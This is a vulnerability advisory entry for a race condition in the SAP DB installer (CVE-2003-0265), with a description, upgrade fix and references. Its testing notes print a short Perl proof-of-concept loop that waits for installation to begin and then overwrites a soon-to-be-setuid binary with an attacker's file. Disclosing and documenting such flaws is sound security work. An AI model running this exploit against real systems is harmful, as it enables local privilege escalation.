SAP DB SDBINST Permission Race Condition Privilege Elevation

2003-04-27T00:00:00
ID OSVDB:11915
Type osvdb
Reporter Larry W. Cashdollar(lwc@vapid.dhs.org)
Modified 2003-04-27T00:00:00

Description

Vulnerability Description

SAP DB contains a flaw that may allow a local malicious user to overwrite the contents of files during installation. The issue is due to a race condition in the installation, a period of several seconds passes between decompressing the files and setting the setuid bits. It is possible that the flaw may allow a malicious local user to overwrite the contents of the files between decompression and setting the setuid bits resulting in a loss of integrity.

Solution Description

Upgrade to version 7.4.03 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

SAP DB contains a flaw that may allow a local malicious user to overwrite the contents of files during installation. The issue is due to a race condition in the installation, a period of several seconds passes between decompressing the files and setting the setuid bits. It is possible that the flaw may allow a malicious local user to overwrite the contents of the files between decompression and setting the setuid bits resulting in a loss of integrity.

Manual Testing Notes

!/bin/perl

while (1) {

$test =`grep -sh PRECOM.ins /tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;

if ( $test =~ /PRECOM/ ) {
    system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
    exit(1);
}

}

References:

Vendor Specific Solution URL: http://www.sapdb.org/7.4/sap_db_downloads.htm Other Advisory URL: http://www.securiteam.com/unixfocus/5AP0N209PY.html ISS X-Force ID: 11881 Generic Informational URL: http://marc.theaimsgroup.com/?l=bugtraq&m=105232424810097&w=2 Generic Exploit URL: http://vapid.dhs.org/sap-db-install.txt CVE-2003-0265 Bugtraq ID: 7421